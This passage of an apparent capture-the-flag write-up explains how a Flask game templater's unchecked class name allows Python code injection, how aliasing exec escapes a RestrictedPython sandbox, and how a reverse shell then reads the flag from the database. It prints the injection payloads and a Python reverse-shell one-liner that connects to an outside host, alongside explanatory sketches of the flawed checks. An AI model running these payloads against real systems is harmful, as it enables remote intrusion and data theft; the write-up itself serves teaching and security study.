            self.player1, self.player2, self.state = self.tick()
            if(self.state['gameover']):
                break
        return "Your game works!"

    def tick(self):
        self.gameover = True
        return {},{},{'gameover':False}
"""

class FlashGameHelper:
    def gen_game_from_template(name):
        tree = ast.parse(GAME_TEMPLATE)
        tree.body[0].name = name
        return b64encode(ast.unparse(tree).encode()).decode()

    def test_game(code,game_name):
        try: 
            # Let's us declare classes in RestrictedPython
            exec_globals = globals().copy()

            exec_globals['__metaclass__'] = type
            exec_globals['__name__'] = "GameTemplate"
            # print(exec_globals)
            # Using this because it should safely create the class
            safe_byte_code = compile_restricted(
                b64decode(code).decode(),
                filename='<inline code>',
                mode='exec',
            )
            exec(safe_byte_code,globals=exec_globals)
            # Trying to run the game breaks, will learn how to implement
            # this properly later, security comes first!!!
            safe_byte_code = compile_restricted(
                f'{game_name}().play()',
                filename='<inline code>',
                mode='exec',
            )
            exec(safe_byte_code,exec_globals)
            return "Game ran successfully."
        except Exception:
            return f"Game failed during testing."

Adding some debug statements to this and trying it again, the error that gets caught is

  File "/app/FlashTemplater.py", line 51, in test_game
    exec(safe_byte_code,exec_globals)
    ~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<inline code>", line 1, in <module>
NameError: name '_getattr_' is not defined. Did you mean: 'getattr'?

It’s also worth mentioning that this code only works in Python 3.13 and up anyway, because exec(safe_byte_code,globals=exec_globals) is invalid in earlier versions, where exec doesn’t accept globals as a keyword argument. This tripped me up for a bit when testing outside of the container until I realized that. The _getattr_ failure is a result of RestrictedPython rewriting attribute access into calls to a _getattr_ guard that the challenge never defines. Since the traceback points at line 1 of the module-level code, it’s most likely the .play lookup in the generated {game_name}().play() call rather than anything inside the class. I ignored this for the time being, instead figuring out how to inject code in the first place. Despite the attempt to sanitize using the ast module, it’s really easy to inject code by creating a game with a name like this:

meow:
    pass
print(1)
class nope

Visiting the game details page for this game it’s clear that this does work, as the displayed source code looks like this:

class meow:
    pass
print(1)
class nope:

    def __init__(self):
        self.board = []
        self.gameover = False
        self.player1, self.player2, self.state = ({}, {}, {'gameover': False})

    def play(self):
        while True:
            self.player1, self.player2, self.state = self.tick()
            if self.state['gameover']:
                break
        return 'Your game works!'

    def tick(self):
        self.gameover = True
        return ({}, {}, {'gameover': False})
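The injection works because ast.unparse writes the class name out verbatim and nothing checks that it is a valid identifier. Here is a cut-down sketch of that behavior, with a shortened template and a hypothetical gen_source helper standing in for gen_game_from_template (it needs Python 3.9 or newer for ast.unparse):

```python
import ast

TEMPLATE = """class GameName:
    def play(self):
        return "Your game works!"
"""

def gen_source(name: str) -> str:
    """Mimic the templater: parse, overwrite the class name, unparse."""
    tree = ast.parse(TEMPLATE)
    tree.body[0].name = name  # no check that this is a valid identifier
    return ast.unparse(tree)

payload = "meow:\n    pass\nprint(1)\nclass nope"
source = gen_source(payload)
print(source)

# Re-parsing shows three top-level statements instead of a single class.
top_level = [type(node).__name__ for node in ast.parse(source).body]
print(top_level)
```

Checking the name with str.isidentifier() before assigning it would be one way to close this particular hole.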

The injected source compiles fine, but when it gets executed the print line throws NameError: name '_print_' is not defined. Did you mean: 'print'?. Again, this is due to RestrictedPython being used. At this point, the challenge is just a standard pyjail, which is something I’m generally pretty good at. I checked out the docs for RestrictedPython, and saw that the normal way it’s used involves restricted builtins:

respy docs

The challenge, however, doesn’t do this. It gives us the entire globals dict, albeit a copy such that we can’t poison the namespace. Because all of the globals still exist, I was curious what would happen if I just tried to call exec(). I used exec("print(1)") as my payload, instead of just print(1). As I somewhat expected, this errored with the reason SyntaxError: ('Line 3: Exec calls are not allowed.',). I did a search in the RestrictedPython repo for this error, and found this:

if isinstance(node.func, ast.Name):
    if node.func.id == 'exec':
        self.error(node, 'Exec calls are not allowed.')
    elif node.func.id == 'eval':
        self.error(node, 'Eval calls are not allowed.')

So… it’s comparing the name of the function as a string? What happens if I just… rename the function? I changed my payload to

meow:
    pass
what = exec
what("print(1)")
class nope

and tried it again. This errored later on with SyntaxError: ("Line 1: SyntaxError: invalid syntax at statement: 'meow:'",) when the second snippet, {game_name}().play(), got compiled, but it made it through the first exec(), which meant my code executed without an error. Most importantly, a line containing 1 showed up in the Flask logs. With the pyjail escaped, the problem was basically solved. From here I just swapped out my benign payload for a proper reverse shell:

meow:
    pass
what = exec
what('import os,pty,socket;s=socket.socket();s.connect(("ce.ns.or.ed",1338));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")')
class nope
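The reason the alias slips through can be shown with a simplified stand-in for that check, written against the standard ast module. NaiveExecCheck is not RestrictedPython's actual transformer, just a sketch of the same idea of matching the callee's name at compile time. Nothing here is executed; the sources are only parsed.

```python
import ast

class NaiveExecCheck(ast.NodeVisitor):
    """Reject calls whose callee is literally named exec or eval."""
    def __init__(self):
        self.errors = []

    def visit_Call(self, node):
        if isinstance(node.func, ast.Name) and node.func.id in ("exec", "eval"):
            self.errors.append(f"Line {node.lineno}: {node.func.id} calls are not allowed.")
        self.generic_visit(node)

def check(source: str):
    checker = NaiveExecCheck()
    checker.visit(ast.parse(source))
    return checker.errors

direct = 'exec("print(1)")'
aliased = 'what = exec\nwhat("print(1)")'

print(check(direct))   # flagged: the callee is the name "exec"
print(check(aliased))  # not flagged: the callee is the name "what"
```

A syntactic check like this can't know what a name is bound to at runtime, which is why the usual RestrictedPython setup also replaces the builtins handed to the executed code.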

As expected, I caught the reverse shell when the payload executed. My shell was inside the Flask container, not the Postgres one, so I couldn’t just cat the flag, but it was fairly simple to open a Python interpreter with python3. I connected to the database the same way the app did and then just called the helper function to get the content of the admin’s game.

>>> from db import DatabaseHelper
>>> database_helper = DatabaseHelper()
>>> database_helper.getGames("admin")
[('best game ever', 'the best game ever', 'UMASS{FLAG_FOR_TESTING}')]

With my solution working locally, I referred to the instructions for spawning a remote instance and repeated it there. My solution worked, and the real flag was UMASS{CR0SS_th3_fl4sH_g4m3_t0_1nj3ct_Pyth0n!1!!11}.